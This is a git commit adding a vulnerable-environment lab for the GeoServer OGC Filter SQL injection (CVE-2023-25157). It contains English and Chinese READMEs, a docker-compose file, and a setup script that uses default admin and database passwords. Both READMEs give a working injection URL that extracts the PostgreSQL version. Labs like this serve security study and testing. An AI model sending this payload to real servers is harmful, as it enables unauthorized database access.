first commit

geoserver/CVE-2023-25157/README.md

@@ -0,0 +1,41 @@
+# GeoServer OGC Filter SQL Injection (CVE-2023-25157)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a variety of sources such as Geographic Information System (GIS) databases, web-based data, and personal datasets.
+
+In the version prior to 2.22.1 and 2.21.4, there is a SQL injection issue that was found in the filter and function expressions defined by the Open Geospatial Consortium (OGC) standards.
+
+References:
+
+- <https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158>
+- <https://github.com/advisories/GHSA-7g5f-wrx8-5ccf>
+
+## Vulnerable environment
+
+Execute following command to start a GeoServer instance 2.22.1:
+
+```
+docker compose up -d
+```
+
+After the server is started, you can browse the default page of GeoServer at `http://your-ip:8080/geoserver`.
+
+## Exploit
+
+First of all, you have to find a existing workspace that contains PostGIS datastore before you exploit the vulnerability. Vulhub's GeoServer instance already have a PostGIS datastore:
+
+- Workspace name: `vulhub`
+- Data store name: `pg`
+- Feature type (table) name: `example`
+- One of attribute from feature type: `name`
+
+Exploit the server by this simple URL:
+
+```
+http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true
+```
+
+![](1.png)
+
+As you can see, the version of PostgreSQL has been retrieved from GeoServer by SQL injection.

geoserver/CVE-2023-25157/README.zh-cn.md

@@ -0,0 +1,39 @@
+# GeoServer OGC Filter SQL注入漏洞（CVE-2023-25157）
+
+GeoServer 是 OpenGIS Web 服务器规范的 J2EE 实现，利用 GeoServer 可以方便的发布地图数据，允许用户对特征数据进行更新、删除、插入操作。
+
+在版本2.22.1和2.21.4及以前，多个OGC表达式中均存在SQL注入漏洞。
+
+参考链接：
+
+- <https://github.com/murataydemir/CVE-2023-25157-and-CVE-2023-25158>
+- <https://github.com/advisories/GHSA-7g5f-wrx8-5ccf>
+
+## 漏洞环境
+
+执行如下命令启动一个GeoServer 2.22.1：
+
+```
+docker compose up -d
+```
+
+环境启动后，访问`http://your-ip:8080/geoserver`即可查看到GeoServer的首页。
+
+## 漏洞复现
+
+在利用漏洞前，需要目标服务器中存在类型是PostGIS的数据空间（datastore）和工作空间（workspace）。在Vulhub中，已经包含满足条件的工作空间，其信息如下：
+
+- Workspace name: `vulhub`
+- Data store name: `pg`
+- Feature type (table) name: `example`
+- One of attribute from feature type: `name`
+
+利用这些已知参数，发送如下URL即可触发SQL注入漏洞：
+
+```
+http://your-ip:8080/geoserver/ows?service=wfs&version=1.0.0&request=GetFeature&typeName=vulhub:example&CQL_FILTER=strStartsWith%28name%2C%27x%27%27%29+%3D+true+and+1%3D%28SELECT+CAST+%28%28SELECT+version()%29+AS+integer%29%29+--+%27%29+%3D+true
+```
+
+![](1.png)
+
+可见，已经使用SQL注入获取到了目标服务器PostgreSQL的版本。

geoserver/CVE-2023-25157/docker-compose.yml

@@ -0,0 +1,16 @@
+version: '3'
+services:
+ web:
+   image: vulhub/geoserver:2.22.1
+   depends_on:
+    - postgres
+   ports:
+    - "8080:8080"
+   volumes:
+     - ./startup.sh:/startup.sh
+   command: bash /startup.sh
+ postgres:
+   image: postgis/postgis:14-3.3-alpine
+   environment: 
+    - POSTGRES_PASSWORD=vulhub
+    - POSTGRES_DB=geoserver

geoserver/CVE-2023-25157/startup.sh

@@ -0,0 +1,28 @@
+#!/bin/bash
+
+AUTH="admin:geoserver"
+/mnt/geoserver/bin/startup.sh &
+GEOSERVER_PID=$!
+
+SERVER_ALIVE=$(curl -s --output /dev/null -u "$AUTH" -XGET --write-out "%{http_code}" http://localhost:8080/geoserver/rest/about/status)
+while [ "$SERVER_ALIVE" -ne 200 ]
+do
+  echo "geoserver is not ready yet, waiting for 1 second..."
+  sleep 1
+  SERVER_ALIVE=$(curl -s --output /dev/null -u "$AUTH" -XGET --write-out "%{http_code}" http://localhost:8080/geoserver/rest/about/status)
+done
+
+VULHUB_EXISTS=$(curl -s --output /dev/null -u "$AUTH" -XGET --write-out "%{http_code}" http://localhost:8080/geoserver/rest/workspaces/vulhub)
+if [ "${VULHUB_EXISTS}" -eq 200 ]; then
+    echo "vulhub wordspace already exists"
+else
+    # refer to <https://github.com/geoserver/geoserver-history/blob/master/doc/en/user/source/restconfig/rest-config-examples/rest-config-examples-curl.rst>
+    curl -XPOST -u "$AUTH" -H "Content-type: application/json" -d '{"workspace":{"name":"vulhub"}}' http://localhost:8080/geoserver/rest/workspaces
+    curl -u "$AUTH" -XPOST -H 'Content-Type: application/json' \
+        -d '{"dataStore":{"name":"pg","connectionParameters":{"host":"postgres","port":5432,"database":"geoserver","user":"postgres","passwd":"vulhub","dbtype":"postgis","createDatabase":true}}}' \
+        http://localhost:8080/geoserver/rest/workspaces/vulhub/datastores
+    curl -u "$AUTH" -XPOST -H 'Content-Type: application/json' -d '{"featureType":{"name":"example","attributes":{"attribute":[{"name":"name","binding":"java.lang.String"}]}}}' http://localhost:8080/geoserver/rest/workspaces/vulhub/datastores/pg/featuretypes
+    echo "target geoserver is initialized successfully"
+fi
+
+wait $GEOSERVER_PID